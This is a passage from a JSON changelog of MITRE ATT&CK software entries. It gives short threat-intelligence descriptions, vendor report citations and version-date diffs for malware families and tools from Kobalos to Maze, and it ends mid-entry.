14:44:10.741000+00:00", + "name": "Kobalos", + "description": "[Kobalos](https://attack.mitre.org/software/S0641) is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. [Kobalos](https://attack.mitre.org/software/S0641) has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. [Kobalos](https://attack.mitre.org/software/S0641) was first identified in late 2019.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0641", + "external_id": "S0641" + }, + { + "source_name": "Kobalos", + "description": "(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)" + }, + { + "source_name": "ESET Kobalos Feb 2021", + "description": "M.Leveille, M., Sanmillan, I. (2021, February 2). Kobalos \u2013 A complex Linux threat to high performance computing infrastructure. Retrieved August 24, 2021.", + "url": "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/" + }, + { + "source_name": "ESET Kobalos Jan 2021", + "description": "M.Leveille, M., Sanmillan, I. (2021, January). A WILD KOBALOS APPEARS Tricksy Linux malware goes after HPCs. Retrieved August 24, 2021.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Kobalos" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Manikantan Srinivasan, NEC Corporation India", + "Pooja Natarajan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:10.741000+00:00\", \"old_value\": \"2025-04-16 20:38:25.723000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f108215f-3487-489d-be8b-80e346d32518", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:45:02.893000+00:00", + "name": "Komplex", + "description": "[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0162", + "external_id": "S0162" + }, + { + "source_name": "XAgentOSX 2017", + "description": "Robert Falcone. (2017, February 14). XAgentOSX: Sofacy's Xagent macOS Tool. Retrieved July 12, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" + }, + { + "source_name": "Sofacy Komplex Trojan", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Komplex" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:02.893000+00:00\", \"old_value\": \"2025-04-16 20:38:42.776000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:33.348000+00:00", + "modified": "2025-04-25 14:42:54.704000+00:00", + "name": "LOWBALL", + "description": "[LOWBALL](https://attack.mitre.org/software/S0042) is malware used by [admin@338](https://attack.mitre.org/groups/G0018). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. (Citation: FireEye admin@338)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0042", + "external_id": "S0042" + }, + { + "source_name": "FireEye admin@338", + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "LOWBALL" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:54.704000+00:00\", \"old_value\": \"2025-04-16 20:37:59.992000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--0efefea5-78da-4022-92bc-d726139e8883", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-03-04 17:12:37.586000+00:00", + "modified": "2025-04-25 14:42:42.534000+00:00", + "name": "Linux Rabbit", + "description": "[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)\n", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0362", + "external_id": "S0362" + }, + { + "source_name": "anomali-linux-rabbit", + "description": "Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved December 17, 2020.", + "url": "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" + }, + { + "source_name": "Anomali Linux Rabbit 2018", + "description": "Anomali Labs. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved March 4, 2019.", + "url": "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Linux Rabbit" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:42.534000+00:00\", \"old_value\": \"2025-04-16 20:37:56.120000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--95e2cbae-d82c-4f7b-b63c-16462015d35d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-24 17:51:35.005000+00:00", + "modified": "2025-04-25 14:44:07.137000+00:00", + "name": "LiteDuke", + "description": "[LiteDuke](https://attack.mitre.org/software/S0513) is a third stage backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016), primarily in 2014-2015. [LiteDuke](https://attack.mitre.org/software/S0513) used the same dropper as [PolyglotDuke](https://attack.mitre.org/software/S0518), and was found on machines also compromised by [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0513", + "external_id": "S0513" + }, + { + "source_name": "ESET Dukes October 2019", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "LiteDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:07.137000+00:00\", \"old_value\": \"2025-04-16 20:38:24.381000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--b865dded-0553-4962-a44b-6fe7863effed", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-07-02 12:58:09.598000+00:00", + "modified": "2025-04-25 14:44:30.421000+00:00", + "name": "LoJax", + "description": "[LoJax](https://attack.mitre.org/software/S0397) is a UEFI rootkit used by [APT28](https://attack.mitre.org/groups/G0007) to persist remote access software on targeted systems.(Citation: ESET LoJax Sept 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0397", + "external_id": "S0397" + }, + { + "source_name": "LoJax", + "description": "(Citation: ESET LoJax Sept 2018)" + }, + { + "source_name": "ESET LoJax Sept 2018", + "description": "ESET. (2018, September). LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "LoJax" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jean-Ian Boutin, ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:30.421000+00:00\", \"old_value\": \"2025-04-16 20:38:32.158000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-14 17:31:33.707000+00:00", + "modified": "2025-04-25 14:44:41.863000+00:00", + "name": "Lokibot", + "description": "[Lokibot](https://attack.mitre.org/software/S0447) is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. [Lokibot](https://attack.mitre.org/software/S0447) can also create a backdoor into infected systems to allow an attacker to install additional payloads.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)(Citation: CISA Lokibot September 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0447", + "external_id": "S0447" + }, + { + "source_name": "Lokibot", + "description": "(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)(Citation: Talos Lokibot Jan 2021)" + }, + { + "source_name": "Infoblox Lokibot January 2019", + "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020.", + "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22" + }, + { + "source_name": "Morphisec Lokibot April 2020", + "description": "Cheruku, H. (2020, April 15). LOKIBOT WITH AUTOIT OBFUSCATOR + FRENCHY SHELLCODE. Retrieved May 14, 2020.", + "url": "https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode" + }, + { + "source_name": "CISA Lokibot September 2020", + "description": "DHS/CISA. (2020, September 22). Alert (AA20-266A) LokiBot Malware . Retrieved September 15, 2021.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-266a" + }, + { + "source_name": "Talos Lokibot Jan 2021", + "description": "Muhammad, I., Unterbrink, H.. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021.", + "url": "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Lokibot" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:41.863000+00:00\", \"old_value\": \"2025-04-16 20:38:35.363000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--c9ccc4df-1f56-49e7-ad57-b383e1451688", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-01 14:07:36.692000+00:00", + "modified": "2025-04-25 14:44:40.541000+00:00", + "name": "LookBack", + "description": "[LookBack](https://attack.mitre.org/software/S0582) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://attack.mitre.org/software/S0582).(Citation: Proofpoint LookBack Malware Aug 2019)(Citation: Dragos TALONITE)(Citation: Dragos Threat Report 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0582", + "external_id": "S0582" + }, + { + "source_name": "LookBack", + "description": "(Citation: Proofpoint LookBack Malware Aug 2019)" + }, + { + "source_name": "Proofpoint LookBack Malware Aug 2019", + "description": "Raggi, M. Schwarz, D.. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021.", + "url": "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks" + }, + { + "source_name": "Dragos TALONITE", + "description": "Dragos. (null). TALONITE. Retrieved February 25, 2021.", + "url": "https://www.dragos.com/threat/talonite/" + }, + { + "source_name": "Dragos Threat Report 2020", + "description": "Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021.", + "url": "https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "LookBack" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:40.541000+00:00\", \"old_value\": \"2025-04-16 20:38:35.052000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--2fab555f-7664-4623-b4e0-1675ae38190b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:10.962000+00:00", + "modified": "2025-04-25 14:45:15.980000+00:00", + "name": "Lslsass", + "description": "[Lslsass](https://attack.mitre.org/software/S0121) is a publicly-available tool that can dump active logon session password hashes from the lsass process. (Citation: Mandiant APT1)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0121", + "external_id": "S0121" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Lslsass" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:15.980000+00:00\", \"old_value\": \"2025-04-16 20:38:50.784000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--54a73038-1937-4d71-a253-316e76d5413c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-11-16 18:40:34.473000+00:00", + "modified": "2025-04-25 14:43:22.226000+00:00", + "name": "Lucifer", + "description": "[Lucifer](https://attack.mitre.org/software/S0532) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.(Citation: Unit 42 Lucifer June 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0532", + "external_id": "S0532" + }, + { + "source_name": "Unit 42 Lucifer June 2020", + "description": "Hsu, K. et al. (2020, June 24). Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices. Retrieved November 16, 2020.", + "url": "https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Lucifer" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:22.226000+00:00\", \"old_value\": \"2025-04-16 20:38:08.548000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--251fbae2-78f6-4de7-84f6-194c727a64ad", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:14.527000+00:00", + "modified": "2025-04-25 14:42:51.586000+00:00", + "name": "Lurid", + "description": "[Lurid](https://attack.mitre.org/software/S0010) is a malware family that has been used by several groups, including [PittyTiger](https://attack.mitre.org/groups/G0011), in targeted attacks as far back as 2006. (Citation: Villeneuve 2014) (Citation: Villeneuve 2011)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0010", + "external_id": "S0010" + }, + { + "source_name": "Villeneuve 2014", + "description": "Villeneuve, N., Homan, J. (2014, July 31). Spy of the Tiger. Retrieved September 29, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" + }, + { + "source_name": "Villeneuve 2011", + "description": "Villeneuve, N., Sancho, D. (2011). THE \u201cLURID\u201d DOWNLOADER. Retrieved November 12, 2014.", + "url": "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_dissecting-lurid-apt.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Lurid", + "Enfal" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:51.586000+00:00\", \"old_value\": \"2025-04-16 20:37:58.843000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-11 21:41:19.008000+00:00", + "modified": "2025-04-25 14:44:11.465000+00:00", + "name": "MESSAGETAP", + "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) is a data mining malware family deployed by [APT41](https://attack.mitre.org/groups/G0096) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. (Citation: FireEye MESSAGETAP October 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0443", + "external_id": "S0443" + }, + { + "source_name": "FireEye MESSAGETAP October 2019", + "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MESSAGETAP" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:11.465000+00:00\", \"old_value\": \"2025-04-16 20:38:26.051000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--049ff071-0b3c-4712-95d2-d21c6aa54501", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:42:32.856000+00:00", + "name": "MURKYTOP", + "description": "[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0233", + "external_id": "S0233" + }, + { + "source_name": "MURKYTOP", + "description": "(Citation: FireEye Periscope March 2018)" + }, + { + "source_name": "FireEye Periscope March 2018", + "description": "FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MURKYTOP" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:32.856000+00:00\", \"old_value\": \"2025-04-16 20:37:52.514000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--f72251cb-2be5-421f-a081-99c29a1209e7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:45:06.639000+00:00", + "name": "MacSpy", + "description": "[MacSpy](https://attack.mitre.org/software/S0282) is a malware-as-a-service offered on the darkweb (Citation: objsee mac malware 2017).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0282", + "external_id": "S0282" + }, + { + "source_name": "MacSpy", + "description": "(Citation: objsee mac malware 2017)." + }, + { + "source_name": "objsee mac malware 2017", + "description": "Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.", + "url": "https://objective-see.com/blog/blog_0x25.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MacSpy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:06.639000+00:00\", \"old_value\": \"2025-04-16 20:38:44.003000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--532c6004-b1e8-415b-9516-f7c14ba783b1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-28 17:48:36.547000+00:00", + "modified": "2025-04-25 14:43:19.128000+00:00", + "name": "MarkiRAT", + "description": "[MarkiRAT](https://attack.mitre.org/software/S0652) is a remote access Trojan (RAT) compiled with Visual Studio that has been used by [Ferocious Kitten](https://attack.mitre.org/groups/G0137) since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0652", + "external_id": "S0652" + }, + { + "source_name": "Kaspersky Ferocious Kitten Jun 2021", + "description": "GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.", + "url": "https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MarkiRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:19.128000+00:00\", \"old_value\": \"2025-04-16 20:38:07.387000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-18 16:17:59.464000+00:00", + "modified": "2025-04-25 14:44:49.604000+00:00", + "name": "Maze", + "description": "[Maze](https://attack.mitre.org/software/S0449) 